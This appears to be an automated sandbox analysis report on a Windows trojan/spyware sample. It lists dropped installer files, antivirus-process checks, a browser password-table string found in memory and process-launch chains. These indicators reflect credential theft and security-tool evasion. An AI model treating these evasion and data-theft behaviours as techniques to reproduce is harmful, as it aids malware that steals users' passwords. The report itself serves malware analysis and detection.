Source: C:\Users\user\Desktop\qnUFsmyxMm.exe

Code function: 0_2_007C2950 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

0_2_007C2950

System Summary

Sample or dropped binary is a compiled AutoHotkey binary

Source: C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe

Window found: window name: AutoHotkey

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_00912A9F	0_2_00912A9F
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_009186D0	0_2_009186D0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007A60F8	0_2_007A60F8
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007CE110	0_2_007CE110
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_0079C9FC	0_2_0079C9FC
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007BC981	0_2_007BC981
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007C9A70	0_2_007C9A70
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007AFA00	0_2_007AFA00
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007B3A00	0_2_007B3A00
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007BDAB4	0_2_007BDAB4
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007C6B50	0_2_007C6B50
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_0079D338	0_2_0079D338
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007B1BE0	0_2_007B1BE0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_0079ABD0	0_2_0079ABD0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007B7380	0_2_007B7380
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007ACC00	0_2_007ACC00
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007CEC00	0_2_007CEC00
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_00798670	0_2_00798670
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007A6ED1	0_2_007A6ED1
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_0079A710	0_2_0079A710
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007C67D0	0_2_007C67D0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_0079DF82	0_2_0079DF82
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007AE870	0_2_007AE870
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007A8857	0_2_007A8857
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007B2820	0_2_007B2820
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007CE820	0_2_007CE820
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007938E0	0_2_007938E0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007B70E0	0_2_007B70E0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007B309E	0_2_007B309E
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007A5152	0_2_007A5152
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007BE145	0_2_007BE145
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007B8938	0_2_007B8938
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007B4120	0_2_007B4120
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007A9F86	0_2_007A9F86
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_00795910	0_2_00795910
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007A790C	0_2_007A790C
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007BC981	0_2_007BC981
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007A59D0	0_2_007A59D0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007C61C0	0_2_007C61C0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007B81B9	0_2_007B81B9
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007AB9B0	0_2_007AB9B0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007BC190	0_2_007BC190
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007CA260	0_2_007CA260
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007BD244	0_2_007BD244
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_00796200	0_2_00796200
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007B9AF0	0_2_007B9AF0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007AE2E0	0_2_007AE2E0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007A9ADE	0_2_007A9ADE
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007BD2CF	0_2_007BD2CF
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_00794290	0_2_00794290
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007AD360	0_2_007AD360
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007CC33D	0_2_007CC33D
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007BD333	0_2_007BD333
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007C2300	0_2_007C2300
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007ADBF0	0_2_007ADBF0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007B33EA	0_2_007B33EA
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_00794BC0	0_2_00794BC0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007993C0	0_2_007993C0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007BDAAF	0_2_007BDAAF
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007B43B0	0_2_007B43B0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007C4B94	0_2_007C4B94
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007CCC70	0_2_007CCC70
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_00797460	0_2_00797460
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007B2440	0_2_007B2440
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007A7409	0_2_007A7409
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007C0CC0	0_2_007C0CC0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007CE490	0_2_007CE490
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007A657A	0_2_007A657A
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007A4D70	0_2_007A4D70
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007CCD60	0_2_007CCD60
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007B4550	0_2_007B4550
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007A7D1A	0_2_007A7D1A
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007B950C	0_2_007B950C
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007AE5F0	0_2_007AE5F0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007B45F7	0_2_007B45F7
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007A1DE0	0_2_007A1DE0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007B8592	0_2_007B8592
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007C2580	0_2_007C2580
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007B7670	0_2_007B7670
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_00795E60	0_2_00795E60
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007B4636	0_2_007B4636
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007B06F0	0_2_007B06F0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007C76E0	0_2_007C76E0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_00792ED0	0_2_00792ED0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007ADED0	0_2_007ADED0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007CCEA0	0_2_007CCEA0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_00796690	0_2_00796690
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007B7690	0_2_007B7690
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007C7F77	0_2_007C7F77
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007C9F70	0_2_007C9F70
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007C5F60	0_2_007C5F60
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007CCF50	0_2_007CCF50
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_00798FE0	0_2_00798FE0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007CCFE0	0_2_007CCFE0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007B0FC0	0_2_007B0FC0
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007C57BC	0_2_007C57BC
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007BD791	0_2_007BD791
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: 0_2_007A9F86	0_2_007A9F86
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Code function: 7_2_03AA1EE0	7_2_03AA1EE0
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Code function: 7_2_03AA16B0	7_2_03AA16B0
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Code function: 7_2_03AA1140	7_2_03AA1140

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp 8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\is-66D10.tmp\_isetup\_isdecmp.dll 31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: String function: 00797FA0 appears 41 times
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Code function: String function: 007A4D60 appears 55 times

Source: GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp.4.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp.6.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows

Source: GWFNGPZJFQA2LD103N7W76JNMRKLK.exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp.4.dr	Static PE information: Number of sections : 11 > 10
Source: GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp.6.dr	Static PE information: Number of sections : 11 > 10

Source: qnUFsmyxMm.exe, 00000000.00000003.3926178432.00000000039AD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3925720235.0000000003A92000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3927226610.0000000003A98000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3937503296.00000000039AB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3787196856.0000000002796000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePastsocv3er.exe4 vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3926386851.00000000039A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3937182260.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3926797756.0000000003A9D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3926046976.0000000003A93000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3927780032.00000000039AC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3936067995.0000000003BAF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3937668851.0000000003AB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000002.3980631709.0000000000B63000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePastsocv3er.exe4 vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3937004478.00000000039A4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3926282396.0000000003A8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3925596656.00000000039AB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3936337478.00000000039AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3934957368.0000000003AAB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3927112712.00000000039A6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3936521892.0000000003AB6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3933782488.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3934553892.00000000039B0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3926589168.0000000003B81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3930159351.00000000039A8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3929008366.00000000039AD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3926488590.0000000003A8E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3925453238.0000000003A8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3937339896.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3937820173.0000000003BD3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3938216484.00000000039AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3929591877.0000000003AAD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3926904587.00000000039AC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3933100072.00000000039A6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3927339651.0000000003B8F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3928316241.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3936700316.00000000039A8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3925309517.00000000039A7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3931951681.0000000003AAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3925905901.00000000039AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3927008169.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3936842642.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3928482811.0000000003B8C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe
Source: qnUFsmyxMm.exe, 00000000.00000003.3926694212.00000000039AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs qnUFsmyxMm.exe

Source: qnUFsmyxMm.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@56/10@2/2

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe

Code function: 0_2_007C6B50 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

0_2_007C6B50

Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp

File created: C:\Users\user\AppData\Roaming\ColorStreamLib

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1516:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4416:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5512:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6560:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6376:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1972:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe

File created: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe

Jump to behavior

Source: qnUFsmyxMm.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'

Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: qnUFsmyxMm.exe, 00000000.00000003.3826704008.000000000336C000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3809887326.0000000003388000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3810009358.000000000336B000.00000004.00000800.00020000.00000000.sdmp, qnUFsmyxMm.exe, 00000000.00000003.3826704008.0000000003400000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: qnUFsmyxMm.exe	Virustotal: Detection: 42%
Source: qnUFsmyxMm.exe	ReversingLabs: Detection: 34%

Source: C:\Users\user\Desktop\qnUFsmyxMm.exe

File read: C:\Users\user\Desktop\qnUFsmyxMm.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\qnUFsmyxMm.exe "C:\Users\user\Desktop\qnUFsmyxMm.exe"
Source: C:\Users\user\Desktop\qnUFsmyxMm.exe	Process created: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe "C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe"
Source: C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe	Process created: C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp "C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp" /SL5="$1044E,7875736,845824,C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe"
